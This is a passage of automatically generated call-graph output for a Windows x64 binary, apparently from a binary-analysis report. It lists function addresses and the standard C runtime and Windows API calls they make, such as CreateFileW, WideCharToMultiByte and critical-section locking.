14080->14072 14082 7ff767ef57a9 14081->14082 14082->14071 14083 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 14082->14083 14083->14075 14086 7ff767ef645c 14084->14086 14085 7ff767ef6618 14087 7ff767ef1230 39 API calls 14085->14087 14086->14085 14089 7ff767ef6581 14086->14089 14090 7ff767ef65a9 14086->14090 14092 7ff767ef6461 BuildCatchObjectHelperInternal 14086->14092 14097 7ff767ef6612 14086->14097 14088 7ff767ef661e 14087->14088 14094 7ff767ef7e98 std::_Facet_Register 39 API calls 14089->14094 14089->14097 14093 7ff767ef7e98 std::_Facet_Register 39 API calls 14090->14093 14091 7ff767ef1190 Concurrency::cancel_current_task 39 API calls 14091->14085 14092->13347 14093->14092 14095 7ff767ef6596 14094->14095 14095->14092 14096 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 14095->14096 14096->14097 14097->14091 14099 7ff767ef6b43 14098->14099 14100 7ff767ef6b9a WideCharToMultiByte 14098->14100 14099->14100 14101 7ff767ef6b4b WideCharToMultiByte 14099->14101 14102 7ff767ef6bcb 14100->14102 14101->14102 14107 7ff767ef2a11 14101->14107 14103 7ff767ef6bcf GetLastError 14102->14103 14104 7ff767ef6bd7 14102->14104 14103->14104 14105 7ff767ef6be4 WideCharToMultiByte 14104->14105 14104->14107 14106 7ff767ef6c11 GetLastError 14105->14106 14105->14107 14106->14107 14107->13311 14108 7ff767ef6620 14107->14108 14109 7ff767ef662d 14108->14109 14110 7ff767ef6644 14108->14110 14109->13318 14113 7ff767ef665e __scrt_get_show_window_mode 14110->14113 14777 7ff767ef6850 14110->14777 14112 7ff767ef66a9 14112->13318 14113->13318 14115 7ff767ef66e9 14114->14115 14123 7ff767ef6848 14114->14123 14118 7ff767ef6842 14115->14118 14119 7ff767ef6762 14115->14119 14120 7ff767ef678e 14115->14120 14126 7ff767ef6747 BuildCatchObjectHelperInternal 14115->14126 14116 7ff767ef1230 39 API calls 14117 7ff767ef684e 14116->14117 14121 7ff767ef1190 Concurrency::cancel_current_task 39 API calls 14118->14121 14119->14118 14124 7ff767ef7e98 std::_Facet_Register 39 API calls 14119->14124 14122 7ff767ef7e98 std::_Facet_Register 39 API calls 14120->14122 14121->14123 14122->14126 14123->14116 14124->14126 14125 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 14125->14118 14126->14125 14127 7ff767ef67ff BuildCatchObjectHelperInternal 14126->14127 14127->13343 14130 7ff767ef59ce 14128->14130 14137 7ff767ef5b4e 14128->14137 14129 7ff767ef1230 39 API calls 14131 7ff767ef5b54 14129->14131 14132 7ff767ef5b48 14130->14132 14133 7ff767ef5a50 14130->14133 14134 7ff767ef5a7c 14130->14134 14140 7ff767ef5a34 BuildCatchObjectHelperInternal 14130->14140 14135 7ff767ef1190 Concurrency::cancel_current_task 39 API calls 14132->14135 14133->14132 14138 7ff767ef7e98 std::_Facet_Register 39 API calls 14133->14138 14136 7ff767ef7e98 std::_Facet_Register 39 API calls 14134->14136 14135->14137 14136->14140 14137->14129 14138->14140 14139 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 14139->14132 14140->14139 14141 7ff767ef5af5 BuildCatchObjectHelperInternal 14140->14141 14141->13345 14143 7ff767ef40bd 14142->14143 14144 7ff767ef4c20 79 API calls 14143->14144 14145 7ff767ef40fa 14143->14145 14144->14145 14145->13358 14147 7ff767eff5c0 _invalid_parameter_noinfo_noreturn 37 API calls 14146->14147 14148 7ff767eff761 14147->14148 14149 7ff767eff778 _invalid_parameter_noinfo_noreturn 17 API calls 14148->14149 14150 7ff767eff776 14149->14150 14791 7ff767ef4680 14151->14791 14159 7ff767ef1673 14158->14159 14160 7ff767ef9d80 std::_Xinvalid_argument 2 API calls 14159->14160 14161 7ff767ef169b 14160->14161 14162 7ff767ef9b3c __std_exception_copy 37 API calls 14161->14162 14163 7ff767ef16cd 14162->14163 14163->13311 14165 7ff767ef19e0 14164->14165 14166 7ff767ef9d80 std::_Xinvalid_argument 2 API calls 14165->14166 14167 7ff767ef1a08 14166->14167 14169 7ff767ef1e70 14168->14169 14169->14169 14170 7ff767ef5cb0 39 API calls 14169->14170 14171 7ff767ef1e84 14170->14171 14172 7ff767ef1340 81 API calls 14171->14172 14174 7ff767ef1e9d 14172->14174 14173 7ff767ef1ed2 14173->13335 14174->14173 14175 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 14174->14175 14176 7ff767ef1ef4 14175->14176 14177 7ff767ef9b3c __std_exception_copy 37 API calls 14176->14177 14178 7ff767ef1f2d 14177->14178 14178->13335 14180 7ff767ef9d9f 14179->14180 14181 7ff767ef9dea RaiseException 14180->14181 14182 7ff767ef9dc8 RtlPcToFileHeader 14180->14182 14181->13339 14183 7ff767ef9de0 14182->14183 14183->14181 14185 7ff767ef7ea3 14184->14185 14186 7ff767ef7ebc 14185->14186 14187 7ff767f00d10 std::_Facet_Register 2 API calls 14185->14187 14188 7ff767ef7ec2 14185->14188 14186->13974 14187->14185 14189 7ff767ef7ecd 14188->14189 14204 7ff767ef8a7c 14188->14204 14191 7ff767ef1190 Concurrency::cancel_current_task 39 API calls 14189->14191 14192 7ff767ef7ed3 14191->14192 14194 7ff767ef119e Concurrency::cancel_current_task 14193->14194 14195 7ff767ef9d80 std::_Xinvalid_argument 2 API calls 14194->14195 14196 7ff767ef11af 14195->14196 14208 7ff767ef9b3c 14196->14208 14198 7ff767ef11d9 14198->13963 14221 7ff767ef7020 14199->14221 14205 7ff767ef8a8a std::bad_alloc::bad_alloc 14204->14205 14206 7ff767ef9d80 std::_Xinvalid_argument 2 API calls 14205->14206 14207 7ff767ef8a9b 14206->14207 14209 7ff767ef9b5d 14208->14209 14211 7ff767ef9b92 ctype 14208->14211 14209->14211 14212 7ff767f039e0 14209->14212 14211->14198 14213 7ff767f039ed 14212->14213 14214 7ff767f039f7 14212->14214 14213->14214 14219 7ff767f03a12 14213->14219 14215 7ff767f006a8 _set_fmode 11 API calls 14214->14215 14216 7ff767f039fe 14215->14216 14217 7ff767eff728 _invalid_parameter_noinfo 37 API calls 14216->14217 14218 7ff767f03a0a 14217->14218 14218->14211 14219->14218 14220 7ff767f006a8 _set_fmode 11 API calls 14219->14220 14220->14216 14226 7ff767ef6f54 14221->14226 14224 7ff767ef9d80 std::_Xinvalid_argument 2 API calls 14225 7ff767ef7042 14224->14225 14227 7ff767ef9b3c __std_exception_copy 37 API calls 14226->14227 14228 7ff767ef6f88 14227->14228 14228->14224 14230 7ff767ef6ae6 14229->14230 14230->13979 14230->13980 14232 7ff767ef6df2 GetLastError 14231->14232 14233 7ff767ef6d6d 14231->14233 14232->14233 14233->13986 14233->13987 14235 7ff767f0492c _Getctype 45 API calls 14234->14235 14236 7ff767eff7c9 14235->14236 14237 7ff767f08a64 _Getctype 45 API calls 14236->14237 14238 7ff767ef6afd 14237->14238 14238->14000 14238->14001 14240 7ff767ef610e 14239->14240 14251 7ff767ef6267 14239->14251 14244 7ff767ef616b 14240->14244 14245 7ff767ef61a7 14240->14245 14250 7ff767ef615e BuildCatchObjectHelperInternal 14240->14250 14241 7ff767ef1230 39 API calls 14242 7ff767ef626d 14241->14242 14242->14005 14243 7ff767ef7e98 std::_Facet_Register 39 API calls 14243->14250 14244->14243 14247 7ff767ef6261 14244->14247 14246 7ff767ef7e98 std::_Facet_Register 39 API calls 14245->14246 14246->14250 14249 7ff767ef1190 Concurrency::cancel_current_task 39 API calls 14247->14249 14248 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 14248->14247 14249->14251 14250->14248 14252 7ff767ef620f BuildCatchObjectHelperInternal 14250->14252 14251->14241 14252->14005 14315 7ff767ef6e4c 14253->14315 14255 7ff767ef7226 14260 7ff767ef7249 ctype BuildCatchObjectHelperInternal 14255->14260 14323 7ff767ef73fc 14255->14323 14257 7ff767ef723e 14326 7ff767ef742c 14257->14326 14319 7ff767ef6ec4 14260->14319 14261 7ff767ef4e3f 14262 7ff767ef54a0 14261->14262 14263 7ff767ef54df 14262->14263 14264 7ff767ef6e4c std::_Lockit::_Lockit 6 API calls 14263->14264 14265 7ff767ef54ec 14264->14265 14266 7ff767ef6e4c std::_Lockit::_Lockit 6 API calls 14265->14266 14271 7ff767ef553b 14265->14271 14267 7ff767ef5511 14266->14267 14269 7ff767ef6ec4 std::_Lockit::~_Lockit LeaveCriticalSection 14267->14269 14268 7ff767ef6ec4 std::_Lockit::~_Lockit LeaveCriticalSection 14270 7ff767ef55cf 14268->14270 14269->14271 14279 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 14270->14279 14272 7ff767ef5585 14271->14272 14359 7ff767ef1b30 14271->14359 14272->14268 14275 7ff767ef55a3 14387 7ff767ef71c4 14275->14387 14276 7ff767ef5624 14390 7ff767ef1a40 14276->14390 14281 7ff767ef4e5b 14279->14281 14281->14014 14281->14015 14283 7ff767ef7662 14282->14283 14286 7ff767ef4f7e 14283->14286 14422 7ff767f003b0 14283->14422 14286->14024 14286->14025 14288 7ff767ef76b0 14288->14286 14445 7ff767efe074 14288->14445 14291 7ff767efe3fd 14290->14291 14295 7ff767ef4fff 14290->14295 14292 7ff767f006a8 _set_fmode 11 API calls 14291->14292 14293 7ff767efe402 14292->14293 14294 7ff767eff728 _invalid_parameter_noinfo 37 API calls 14293->14294 14294->14295 14296 7ff767ef5860 14295->14296 14297 7ff767ef6e4c std::_Lockit::_Lockit 6 API calls 14296->14297 14298 7ff767ef5890 14297->14298 14299 7ff767ef6e4c std::_Lockit::_Lockit 6 API calls 14298->14299 14302 7ff767ef58df 14298->14302 14300 7ff767ef58b5 14299->14300 14304 7ff767ef6ec4 std::_Lockit::~_Lockit LeaveCriticalSection 14300->14304 14301 7ff767ef6ec4 std::_Lockit::~_Lockit LeaveCriticalSection 14303 7ff767ef5970 14301->14303 14306 7ff767ef592c 14302->14306 14703 7ff767ef6290 14302->14703 14305 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 14303->14305 14304->14302 14307 7ff767ef5980 14305->14307 14306->14301 14307->14037 14310 7ff767ef5993 14312 7ff767ef1a40 Concurrency::cancel_current_task 39 API calls 14310->14312 14311 7ff767ef5944 14313 7ff767ef71c4 std::_Facet_Register 39 API calls 14311->14313 14314 7ff767ef5998 14312->14314 14313->14306 14316 7ff767ef6e60 14315->14316 14317 7ff767ef6e5b 14315->14317 14316->14255 14330 7ff767efffa0 14317->14330 14320 7ff767ef6ecf LeaveCriticalSection 14319->14320 14321 7ff767ef6ed8 14319->14321 14321->14261 14324 7ff767ef7e98 std::_Facet_Register 39 API calls 14323->14324 14325 7ff767ef740e 14324->14325 14325->14257 14327 7ff767ef7451 14326->14327 14328 7ff767ef743e 14326->14328 14327->14260 14354 7ff767ef7a3c 14328->14354 14333 7ff767f06ae8 14330->14333 14334 7ff767f06400 __crtLCMapStringW 5 API calls 14333->14334 14335 7ff767f06b08 14334->14335 14336 7ff767f06400 __crtLCMapStringW 5 API calls 14335->14336 14337 7ff767f06b27 14336->14337 14338 7ff767f06400 __crtLCMapStringW 5 API calls 14337->14338 14339 7ff767f06b46 14338->14339 14340 7ff767f06400 __crtLCMapStringW 5 API calls 14339->14340 14341 7ff767f06b65 14340->14341 14342 7ff767f06400 __crtLCMapStringW 5 API calls 14341->14342 14343 7ff767f06b84 14342->14343 14344 7ff767f06400 __crtLCMapStringW 5 API calls 14343->14344 14345 7ff767f06ba3 14344->14345 14346 7ff767f06400 __crtLCMapStringW 5 API calls 14345->14346 14347 7ff767f06bc2 14346->14347 14348 7ff767f06400 __crtLCMapStringW 5 API calls 14347->14348 14349 7ff767f06be1 14348->14349 14350 7ff767f06400 __crtLCMapStringW 5 API calls 14349->14350 14351 7ff767f06c00 14350->14351 14352 7ff767f06400 __crtLCMapStringW 5 API calls 14351->14352 14353 7ff767f06c1f 14352->14353 14355 7ff767ef7a71 14354->14355 14356 7ff767ef7a4a EncodePointer 14354->14356 14357 7ff767effe88 BuildCatchObjectHelperInternal 45 API calls 14355->14357 14356->14327 14358 7ff767ef7a76 14357->14358 14360 7ff767ef1b5c 14359->14360 14385 7ff767ef1c90 14359->14385 14361 7ff767ef7e98 std::_Facet_Register 39 API calls 14360->14361 14360->14385 14362 7ff767ef1b6f 14361->14362 14363 7ff767ef6e4c std::_Lockit::_Lockit 6 API calls 14362->14363 14364 7ff767ef1ba0 14363->14364 14365 7ff767ef1cae 14364->14365 14366 7ff767ef1bdc 14364->14366 14401 7ff767ef7044 14365->14401 14396 7ff767ef7374 14366->14396 14385->14275 14385->14276 14388 7ff767ef7e98 std::_Facet_Register 39 API calls 14387->14388 14389 7ff767ef71d7 14388->14389 14389->14272 14391 7ff767ef1a4e Concurrency::cancel_current_task 14390->14391 14392 7ff767ef9d80 std::_Xinvalid_argument 2 API calls 14391->14392 14393 7ff767ef1a5f 14392->14393 14394 7ff767ef9b3c __std_exception_copy 37 API calls 14393->14394 14395 7ff767ef1a89 14394->14395 14406 7ff767f002a8 14396->14406 14419 7ff767ef6fd8 14401->14419 14404 7ff767ef9d80 std::_Xinvalid_argument 2 API calls 14405 7ff767ef7066 14404->14405 14407 7ff767f06ae8 std::_Locinfo::_Locinfo_ctor 5 API calls 14406->14407 14408 7ff767f002be 14407->14408 14411 7ff767efffcc 14408->14411 14418 7ff767efff30 EnterCriticalSection 14411->14418 14420 7ff767ef9b3c __std_exception_copy 37 API calls 14419->14420 14421 7ff767ef700c 14420->14421 14421->14404 14423 7ff767f002f4 14422->14423 14424 7ff767f00311 14423->14424 14426 7ff767f0033d 14423->14426 14425 7ff767f006a8 _set_fmode 11 API calls 14424->14425 14427 7ff767f00316 14425->14427 14428 7ff767f00342 14426->14428 14429 7ff767f0034f 14426->14429 14430 7ff767eff728 _invalid_parameter_noinfo 37 API calls 14427->14430 14432 7ff767f006a8 _set_fmode 11 API calls 14428->14432 14449 7ff767f05fc8 14429->14449 14431 7ff767ef7695 14430->14431 14431->14286 14441 7ff767eff308 14431->14441 14432->14431 14435 7ff767f00363 14437 7ff767f006a8 _set_fmode 11 API calls 14435->14437 14436 7ff767f00370 14456 7ff767f09a44 14436->14456 14437->14431 14439 7ff767f00384 14461 7ff767efe448 LeaveCriticalSection 14439->14461 14442 7ff767eff338 14441->14442 14680 7ff767eff000 14442->14680 14444 7ff767eff354 14444->14288 14446 7ff767efe0a4 14445->14446 14692 7ff767efdf50 14446->14692 14448 7ff767efe0bd 14448->14286 14462 7ff767efff30 EnterCriticalSection 14449->14462 14451 7ff767f05fdf 14452 7ff767f0603c 19 API calls 14451->14452 14453 7ff767f05fea 14452->14453 14454 7ff767efff84 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 14453->14454 14455 7ff767f00359 14454->14455 14455->14435 14455->14436 14463 7ff767f09780 14456->14463 14459 7ff767f09a9e 14459->14439 14468 7ff767f097aa 14463->14468 14464 7ff767f006a8 _set_fmode 11 API calls 14465 7ff767f09a23 14464->14465 14466 7ff767eff728 _invalid_parameter_noinfo 37 API calls 14465->14466 14467 7ff767f09966 14466->14467 14467->14459 14475 7ff767f0feb4 14467->14475 14473 7ff767f0995d 14468->14473 14478 7ff767f0f688 14468->14478 14470 7ff767f099be 14471 7ff767f0f688 45 API calls 14470->14471 14470->14473 14472 7ff767f099df 14471->14472 14472->14473 14474 7ff767f0f688 45 API calls 14472->14474 14473->14464 14473->14467 14474->14473 14493 7ff767f0f788 14475->14493 14479 7ff767f0f695 14478->14479 14482 7ff767f0f6cb 14478->14482 14480 7ff767f006a8 _set_fmode 11 API calls 14479->14480 14491 7ff767f0f63c 14479->14491 14483 7ff767f0f69f 14480->14483 14481 7ff767f0f6f5 14484 7ff767f006a8 _set_fmode 11 API calls 14481->14484 14482->14481 14485 7ff767f0f71a 14482->14485 14486 7ff767eff728 _invalid_parameter_noinfo 37 API calls 14483->14486 14487 7ff767f0f6fa 14484->14487 14490 7ff767f006c8 TranslateName 45 API calls 14485->14490 14492 7ff767f0f705 14485->14492 14489 7ff767f0f6aa 14486->14489 14488 7ff767eff728 _invalid_parameter_noinfo 37 API calls 14487->14488 14488->14492 14489->14470 14490->14492 14491->14470 14492->14470 14494 7ff767f0f79f 14493->14494 14498 7ff767f0f7bd 14493->14498 14495 7ff767f006a8 _set_fmode 11 API calls 14494->14495 14496 7ff767f0f7a4 14495->14496 14500 7ff767eff728 _invalid_parameter_noinfo 37 API calls 14496->14500 14497 7ff767f0f7d9 14504 7ff767f0fd98 14497->14504 14498->14494 14498->14497 14502 7ff767f0f7b0 14500->14502 14502->14459 14505 7ff767f006c8 TranslateName 45 API calls 14504->14505 14506 7ff767f0fdeb 14505->14506 14507 7ff767f06614 5 API calls 14506->14507 14509 7ff767f0fdfb 14506->14509 14507->14509 14516 7ff767f00800 14509->14516 14511 7ff767f0fe57 14513 7ff767f0f804 14511->14513 14514 7ff767f05ce8 __free_lconv_mon 11 API calls 14511->14514 14513->14502 14515 7ff767f0c2d4 LeaveCriticalSection 14513->14515 14514->14513 14517 7ff767f0084e 14516->14517 14518 7ff767f0082a 14516->14518 14519 7ff767f00853 14517->14519 14520 7ff767f008a8 14517->14520 14522 7ff767f05ce8 __free_lconv_mon 11 API calls 14518->14522 14525 7ff767f00839 14518->14525 14523 7ff767f00868 14519->14523 14519->14525 14526 7ff767f05ce8 __free_lconv_mon 11 API calls 14519->14526 14521 7ff767f0a2e0 _fread_nolock MultiByteToWideChar 14520->14521 14532 7ff767f008c4 14521->14532 14522->14525 14527 7ff767f08e50 std::_Locinfo::_Locinfo_ctor 12 API calls 14523->14527 14524 7ff767f008cb GetLastError 14528 7ff767f0061c _fread_nolock 11 API calls 14524->14528 14525->14511 14538 7ff767f0fee8 14525->14538 14526->14523 14527->14525 14531 7ff767f008d8 14528->14531 14529 7ff767f00906 14529->14525 14530 7ff767f0a2e0 _fread_nolock MultiByteToWideChar 14529->14530 14534 7ff767f0094a 14530->14534 14535 7ff767f006a8 _set_fmode 11 API calls 14531->14535 14532->14524 14532->14529 14533 7ff767f008f9 14532->14533 14536 7ff767f05ce8 __free_lconv_mon 11 API calls 14532->14536 14537 7ff767f08e50 std::_Locinfo::_Locinfo_ctor 12 API calls 14533->14537 14534->14524 14534->14525 14535->14525 14536->14533 14537->14529 14581 7ff767f0facc 14538->14581 14541 7ff767f0ff5d 14613 7ff767f00688 14541->14613 14542 7ff767f0ff75 14601 7ff767f0c2fc 14542->14601 14546 7ff767f0ff9a CreateFileW 14549 7ff767f10080 GetFileType 14546->14549 14550 7ff767f10005 14546->14550 14547 7ff767f0ff81 14548 7ff767f00688 _fread_nolock 11 API calls 14547->14548 14553 7ff767f0ff86 14548->14553 14552 7ff767f1008d GetLastError 14549->14552 14561 7ff767f100de 14549->14561 14554 7ff767f1004d GetLastError 14550->14554 14557 7ff767f10013 CreateFileW 14550->14557 14551 7ff767f006a8 _set_fmode 11 API calls 14574 7ff767f0ff6e 14551->14574 14555 7ff767f0061c _fread_nolock 11 API calls 14552->14555 14556 7ff767f006a8 _set_fmode 11 API calls 14553->14556 14558 7ff767f0061c _fread_nolock 11 API calls 14554->14558 14559 7ff767f1009c CloseHandle 14555->14559 14560 7ff767f0ff62 14556->14560 14557->14549 14557->14554 14558->14560 14559->14560 14562 7ff767f100ce 14559->14562 14560->14551 14616 7ff767f0c214 14561->14616 14564 7ff767f006a8 _set_fmode 11 API calls 14562->14564 14566 7ff767f100d3 14564->14566 14566->14560 14567 7ff767f10154 14571 7ff767f1015b 14567->14571 14644 7ff767f0f84c 14567->14644 14640 7ff767f05e60 14571->14640 14572 7ff767f101a1 14572->14574 14575 7ff767f10220 CloseHandle CreateFileW 14572->14575 14574->14511 14576 7ff767f10267 GetLastError 14575->14576 14577 7ff767f10295 14575->14577 14578 7ff767f0061c _fread_nolock 11 API calls 14576->14578 14577->14574 14579 7ff767f10274 14578->14579 14671 7ff767f0c43c 14579->14671 14582 7ff767f0faf8 14581->14582 14590 7ff767f0fb12 14581->14590 14583 7ff767f006a8 _set_fmode 11 API calls 14582->14583 14582->14590 14584 7ff767f0fb07 14583->14584 14585 7ff767eff728 _invalid_parameter_noinfo 37 API calls 14584->14585 14585->14590 14586 7ff767f0fbe1 14588 7ff767f01f38 37 API calls 14586->14588 14597 7ff767f0fc3e 14586->14597 14587 7ff767f0fb90 14587->14586 14589 7ff767f006a8 _set_fmode 11 API calls 14587->14589 14591 7ff767f0fc3a 14588->14591 14592 7ff767f0fbd6 14589->14592 14590->14587 14593 7ff767f006a8 _set_fmode 11 API calls 14590->14593 14594 7ff767f0fcbc 14591->14594 14591->14597 14595 7ff767eff728 _invalid_parameter_noinfo 37 API calls 14592->14595 14596 7ff767f0fb85 14593->14596 14598 7ff767eff778 _invalid_parameter_noinfo_noreturn 17 API calls 14594->14598 14595->14586 14599 7ff767eff728 _invalid_parameter_noinfo 37 API calls 14596->14599 14597->14541 14597->14542 14600 7ff767f0fcd1 14598->14600 14599->14587 14602 7ff767efff30 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 14601->14602 14603 7ff767f0c31f 14602->14603 14604 7ff767f0c348 14603->14604 14609 7ff767f0c39e EnterCriticalSection 14603->14609 14611 7ff767f0c36b 14603->14611 14606 7ff767f0c04c 17 API calls 14604->14606 14605 7ff767efff84 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 14607 7ff767f0c41d 14605->14607 14608 7ff767f0c34d 14606->14608 14607->14546 14607->14547 14608->14611 14612 7ff767f0c1ec _fread_nolock EnterCriticalSection 14608->14612 14610 7ff767f0c3ad LeaveCriticalSection 14609->14610 14609->14611 14610->14603 14611->14605 14612->14611 14614 7ff767f04aa4 _set_fmode 11 API calls 14613->14614 14615 7ff767f00691 14614->14615 14615->14560 14617 7ff767f0c2a2 14616->14617 14619 7ff767f0c237 14616->14619 14618 7ff767f006a8 _set_fmode 11 API calls 14617->14618 14620 7ff767f0c2a7 14618->14620 14619->14617 14624 7ff767f0c263 14619->14624 14621 7ff767f00688 _fread_nolock 11 API calls 14620->14621 14622 7ff767f0c295 14621->14622 14622->14567 14625 7ff767f0fcd4 14622->14625 14623 7ff767f0c28c SetStdHandle 14623->14622 14624->14622 14624->14623 14626 7ff767f0fd0b 14625->14626 14627 7ff767f0fd3b 14625->14627 14626->14627 14628 7ff767f08120 _fread_nolock 39 API calls 14626->14628 14627->14567 14629 7ff767f0fd20 14628->14629 14630 7ff767f0fd29 14629->14630 14631 7ff767f0fd3f 14629->14631 14632 7ff767f00688 _fread_nolock 11 API calls 14630->14632 14633 7ff767f07a60 _fread_nolock 49 API calls 14631->14633 14634 7ff767f0fd2e 14632->14634 14635 7ff767f0fd56 14633->14635 14634->14627 14637 7ff767f006a8 _set_fmode 11 API calls 14634->14637 14636 7ff767f0fd6c 14635->14636 14639 7ff767f11364 71 API calls 14635->14639 14636->14634 14638 7ff767f08120 _fread_nolock 39 API calls 14636->14638 14637->14627 14638->14634 14639->14636 14641 7ff767f05e90 14640->14641 14642 7ff767f05ef8 40 API calls 14641->14642 14643 7ff767f05ea9 14642->14643 14643->14574 14645 7ff767f0f9c5 14644->14645 14646 7ff767f0f89d 14644->14646 14645->14571 14645->14572 14647 7ff767f01f38 37 API calls 14646->14647 14653 7ff767f0f8bc 14646->14653 14648 7ff767f0f8b4 14647->14648 14649 7ff767f0fab7 14648->14649 14648->14653 14650 7ff767eff778 _invalid_parameter_noinfo_noreturn 17 API calls 14649->14650 14651 7ff767f0facb 14650->14651 14652 7ff767f0f9ba 14652->14645 14654 7ff767f07a60 _fread_nolock 49 API calls 14652->14654 14655 7ff767f0f9c0 14652->14655 14653->14645 14653->14652 14656 7ff767f0f96e 14653->14656 14657 7ff767f08120 _fread_nolock 39 API calls 14653->14657 14661 7ff767f0f9ec 14654->14661 14655->14645 14658 7ff767f006a8 _set_fmode 11 API calls 14655->14658 14656->14645 14656->14655 14659 7ff767f05828 69 API calls 14656->14659 14660 7ff767f0f9a8 14657->14660 14658->14645 14659->14656 14660->14656 14665 7ff767f0f9ad 14660->14665 14661->14645 14661->14655 14662 7ff767f0fa4e 14661->14662 14663 7ff767f0fa28 14661->14663 14664 7ff767f0fa1b 14661->14664 14666 7ff767f08120 _fread_nolock 39 API calls 14662->14666 14663->14662 14669 7ff767f0fa31 14663->14669 14667 7ff767f006a8 _set_fmode 11 API calls 14664->14667 14668 7ff767f08120 _fread_nolock 39 API calls 14665->14668 14666->14655 14667->14655 14668->14652 14670 7ff767f08120 _fread_nolock 39 API calls 14669->14670 14670->14655 14672 7ff767f0c458 14671->14672 14673 7ff767f0c4ca 14671->14673 14672->14673 14679 7ff767f0c48b 14672->14679 14674 7ff767f006a8 _set_fmode 11 API calls 14673->14674 14675 7ff767f0c4cf 14674->14675 14676 7ff767f00688 _fread_nolock 11 API calls 14675->14676 14677 7ff767f0c4bc 14676->14677 14677->14577 14678 7ff767f0c4b4 SetStdHandle 14678->14677 14679->14677 14679->14678 14681 7ff767eff06a 14680->14681 14682 7ff767eff02a 14680->14682 14681->14682 14684 7ff767eff076 14681->14684 14683 7ff767eff65c _invalid_parameter_noinfo_noreturn 37 API calls 14682->14683 14690 7ff767eff051 14683->14690 14691 7ff767efe43c EnterCriticalSection 14684->14691 14690->14444 14693 7ff767efdf6b 14692->14693 14694 7ff767efdf99 14692->14694 14696 7ff767eff65c _invalid_parameter_noinfo_noreturn 37 API calls 14693->14696 14695 7ff767efdf8b 14694->14695 14702 7ff767efe43c EnterCriticalSection 14694->14702 14695->14448 14696->14695 14698 7ff767efdfb0 14699 7ff767efdfcc 72 API calls 14698->14699 14700 7ff767efdfbc 14699->14700 14701 7ff767efe448 _fread_nolock LeaveCriticalSection 14700->14701 14701->14695 14704 7ff767ef62bc 14703->14704 14718 7ff767ef593e 14703->14718 14705 7ff767ef7e98 std::_Facet_Register 39 API calls 14704->14705 14704->14718 14706 7ff767ef62cf 14705->14706 14707 7ff767ef6e4c std::_Lockit::_Lockit 6 API calls 14706->14707 14708 7ff767ef6300 14707->14708 14709 7ff767ef63f6 14708->14709 14710 7ff767ef633c 14708->14710 14711 7ff767ef7044 39 API calls 14709->14711 14712 7ff767ef7374 std::_Locinfo::_Locinfo_ctor 80 API calls 14710->14712 14713 7ff767ef6402 14711->14713 14714 7ff767ef6348 14712->14714 14719 7ff767ef73e0 14714->14719 14716 7ff767ef6ec4 std::_Lockit::~_Lockit LeaveCriticalSection 14716->14718 14717 7ff767ef6363 ctype 14717->14716 14718->14310 14718->14311 14720 7ff767ef73f4 14719->14720 14721 7ff767ef73ed 14719->14721 14720->14717 14722 7ff767f002a8 std::_Locinfo::_Locinfo_ctor 80 API calls 14721->14722 14722->14720 14724 7ff767ef52ce 14723->14724 14730 7ff767ef5350 14723->14730 14744 7ff767ef49d0 14724->14744 14725 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 14727 7ff767ef537e 14725->14727 14727->14040 14729 7ff767ef533d 14729->14730 14731 7ff767ef53f0 81 API calls 14729->14731 14730->14725 14731->14730 14732 7ff767ef5393 14733 7ff767ef1e40 81 API calls 14732->14733 14734 7ff767ef53d5 14733->14734 14735 7ff767ef9d80 std::_Xinvalid_argument 2 API calls 14734->14735 14736 7ff767ef53e6 14735->14736 14738 7ff767ef5439 14737->14738 14739 7ff767ef5407 14737->14739 14738->14043 14739->14738 14740 7ff767ef1e40 81 API calls 14739->14740 14741 7ff767ef547f 14740->14741 14742 7ff767ef9d80 std::_Xinvalid_argument 2 API calls 14741->14742 14743 7ff767ef5490 14742->14743 14745 7ff767ef49f9 14744->14745 14746 7ff767ef5290 81 API calls 14745->14746 14747 7ff767ef4a0e 14745->14747 14746->14747 14747->14729 14747->14732 14749 7ff767ef4b53 14748->14749 14750 7ff767ef4c02 14748->14750 14749->14750 14756 7ff767ef4b5d 14749->14756 14751 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 14750->14751 14752 7ff767ef4c11 14751->14752 14752->14053 14753 7ff767ef4ba1 14754 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 14753->14754 14755 7ff767ef4bbe 14754->14755 14755->14053 14756->14753 14758 7ff767efe7c4 14756->14758 14759 7ff767efe7f4 14758->14759 14762 7ff767efe514 14759->14762 14761 7ff767efe812 14761->14753 14763 7ff767efe534 14762->14763 14764 7ff767efe561 14762->14764 14763->14764 14765 7ff767efe53e 14763->14765 14766 7ff767efe569 14763->14766 14764->14761 14767 7ff767eff65c _invalid_parameter_noinfo_noreturn 37 API calls 14765->14767 14769 7ff767efe454 14766->14769 14767->14764 14776 7ff767efe43c EnterCriticalSection 14769->14776 14778 7ff767ef69e5 14777->14778 14781 7ff767ef6884 14777->14781 14779 7ff767ef1230 39 API calls 14778->14779 14780 7ff767ef69eb 14779->14780 14783 7ff767ef68dd 14781->14783 14784 7ff767ef6919 14781->14784 14789 7ff767ef68d0 __scrt_get_show_window_mode BuildCatchObjectHelperInternal 14781->14789 14782 7ff767ef7e98 std::_Facet_Register 39 API calls 14782->14789 14783->14782 14785 7ff767ef69df 14783->14785 14786 7ff767ef7e98 std::_Facet_Register 39 API calls 14784->14786 14788 7ff767ef1190 Concurrency::cancel_current_task 39 API calls 14785->14788 14786->14789 14787 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 14787->14785 14788->14778 14789->14787 14790 7ff767ef6988 __scrt_get_show_window_mode BuildCatchObjectHelperInternal 14789->14790 14790->14112 14792 7ff767ef46a0 14791->14792 14792->14792 14793 7ff767ef5cb0 39 API calls 14792->14793 14794 7ff767ef2875 14793->14794 14795 7ff767ef2140 14794->14795 14798 7ff767ef1340 14795->14798 14797 7ff767ef2168 14815 7ff767ef46c0 14798->14815 14800 7ff767ef1380 14801 7ff767ef13aa 14800->14801 14802 